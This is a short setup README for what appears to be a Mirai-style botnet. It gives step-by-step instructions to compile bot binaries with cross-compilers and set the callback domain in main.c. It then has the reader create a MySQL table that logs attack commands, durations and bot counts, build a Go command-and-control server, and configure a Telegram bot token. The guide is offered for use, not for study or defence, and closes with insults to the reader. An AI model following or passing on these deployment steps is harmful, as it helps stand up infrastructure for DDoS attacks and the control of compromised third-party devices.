UBUNTU 20.04

1. make setup-packages
UPLOAD YOUR COMPILERS AND AFTER U UPLOADED THEM DO :
2. make setup-crosscompilers
3. change domain from main.c
4. bash build.sh
5. apt install mysql-server -y
6. do mysql and then do :

CREATE USER 'cat'@'localhost' IDENTIFIED BY 'Meow@123!';
GRANT ALL PRIVILEGES ON *.* TO 'cat'@'localhost' WITH GRANT OPTION;
CREATE DATABASE cat;
use cat;
CREATE TABLE `history` (
  `id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
  `user_id` INT(10) UNSIGNED NOT NULL,
  `time_sent` BIGINT(20) UNSIGNED NOT NULL,
  `duration` INT(10) UNSIGNED NOT NULL,
  `command` TEXT NOT NULL,
  `max_bots` INT(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
exit;

7. systemctl start mysql
8. install golang like this:

cd /tmp
wget https://dl.google.com/go/go1.20.6.linux-amd64.tar.gz -q
tar -xvf go1.20.6.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/

then do:

cd cnc
go build

AND BEFORE YOU START THEE CNC MODIFY THE CONFIG.JSON FOR THEE TELEEGRAM BOT TOKEN AND CHAT ID

if you have any problems with the src, the src is not the problem u are just dumb and didnt do the setup good or u have 0 brain cells